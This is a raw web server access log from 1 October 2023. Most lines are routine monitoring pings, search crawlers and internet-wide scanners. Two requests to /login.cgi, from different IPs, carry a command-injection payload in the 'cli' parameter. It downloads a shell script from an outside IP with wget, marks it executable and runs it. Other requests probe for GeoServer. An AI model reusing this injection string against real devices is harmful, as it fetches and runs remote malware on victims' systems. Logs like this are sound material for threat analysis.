212.91.246.72 - - [01/Oct/2023:10:41:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:42:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:43:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.121 - - [01/Oct/2023:10:43:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
79.110.62.78 - - [01/Oct/2023:10:44:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Oct/2023:10:44:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:45:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:46:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:47:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.81.160.182 - - [01/Oct/2023:10:48:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Oct/2023:10:48:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:49:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:50:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:51:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:52:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:53:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:54:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:55:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:56:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:57:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:58:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:10:59:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:00:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:01:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:02:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:03:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:04:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:05:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
200.141.228.34 - - [01/Oct/2023:11:05:54 +0200] "GET /login.cgi?cli=aa%20aa%27cd%20/tmp;wget%20http://194.180.48.100/l.sh;chmod%20777%20l.sh%20sh%20/tmp/%27$l.sh HTTP/1.1" 400 329 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
212.91.246.72 - - [01/Oct/2023:11:06:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
52.167.144.231 - - [01/Oct/2023:11:07:21 +0200] "GET /sitemap_index.xml HTTP/1.1" 404 335 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
212.91.246.72 - - [01/Oct/2023:11:07:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:08:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:09:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:10:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:11:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:12:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:13:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:14:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:15:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:16:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:17:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:18:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:19:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:20:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.138.124 - - [01/Oct/2023:11:20:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.124 - - [01/Oct/2023:11:20:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.124 - - [01/Oct/2023:11:20:47 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.124 - - [01/Oct/2023:11:20:47 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Oct/2023:11:21:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
163.123.142.245 - - [01/Oct/2023:11:22:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Oct/2023:11:22:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:23:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:24:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:25:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:26:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:27:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:28:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:29:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:30:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:31:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:32:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:33:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:34:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:35:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:36:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:37:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:38:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:39:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:40:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:41:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.95.40.17 - - [01/Oct/2023:11:41:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Oct/2023:11:42:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.140 - - [01/Oct/2023:11:43:26 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Oct/2023:11:43:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:44:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:45:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:46:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:47:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.204.84.28 - - [01/Oct/2023:11:47:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
85.204.84.28 - - [01/Oct/2023:11:47:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Oct/2023:11:48:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:49:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:50:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:51:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:52:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.35.18.187 - - [01/Oct/2023:11:53:19 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Oct/2023:11:53:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:54:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:55:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:56:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
52.167.144.136 - - [01/Oct/2023:11:57:36 +0200] "GET /sitemap_index.xml HTTP/1.1" 404 335 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
212.91.246.72 - - [01/Oct/2023:11:57:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:58:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:11:59:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.1.70 - - [01/Oct/2023:11:59:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Oct/2023:12:00:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:01:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:02:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:03:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:04:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:05:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:06:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:07:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:08:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:09:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:10:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
163.123.142.245 - - [01/Oct/2023:12:11:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Oct/2023:12:11:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
163.123.142.245 - - [01/Oct/2023:12:11:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Oct/2023:12:12:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:13:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.235.24.175 - - [01/Oct/2023:12:14:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Oct/2023:12:14:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:15:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.93.203.137 - - [01/Oct/2023:12:16:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Oct/2023:12:16:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:17:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:18:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
163.123.142.245 - - [01/Oct/2023:12:19:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Oct/2023:12:19:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:20:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.82.47.5 - - [01/Oct/2023:12:20:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0"
65.49.20.68 - - [01/Oct/2023:12:20:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
65.49.1.66 - - [01/Oct/2023:12:21:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
212.91.246.72 - - [01/Oct/2023:12:21:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.20.68 - - [01/Oct/2023:12:22:36 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
212.91.246.72 - - [01/Oct/2023:12:22:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.1.67 - - [01/Oct/2023:12:22:47 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
65.49.20.68 - - [01/Oct/2023:12:23:09 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0"
65.49.1.78 - - [01/Oct/2023:12:23:27 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
74.82.47.5 - - [01/Oct/2023:12:23:34 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15"
212.91.246.72 - - [01/Oct/2023:12:23:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.82.47.5 - - [01/Oct/2023:12:24:18 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0"
212.91.246.72 - - [01/Oct/2023:12:24:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:25:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:26:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:27:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:28:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:29:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:30:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:31:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:32:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:33:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:34:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:35:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:36:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
35.203.211.119 - - [01/Oct/2023:12:37:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [01/Oct/2023:12:37:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:38:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.237 - - [01/Oct/2023:12:39:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Oct/2023:12:39:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
201.77.165.42 - - [01/Oct/2023:12:40:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
201.77.165.42 - - [01/Oct/2023:12:40:17 +0200] "GET /login.cgi?cli=aa%20aa%27cd%20/tmp;wget%20http://194.180.48.100/l.sh;chmod%20777%20l.sh%20sh%20/tmp/%27$l.sh HTTP/1.1" 400 329 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
5.196.102.77 - - [01/Oct/2023:12:40:31 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
212.91.246.72 - - [01/Oct/2023:12:40:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Oct/2023:12:41:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
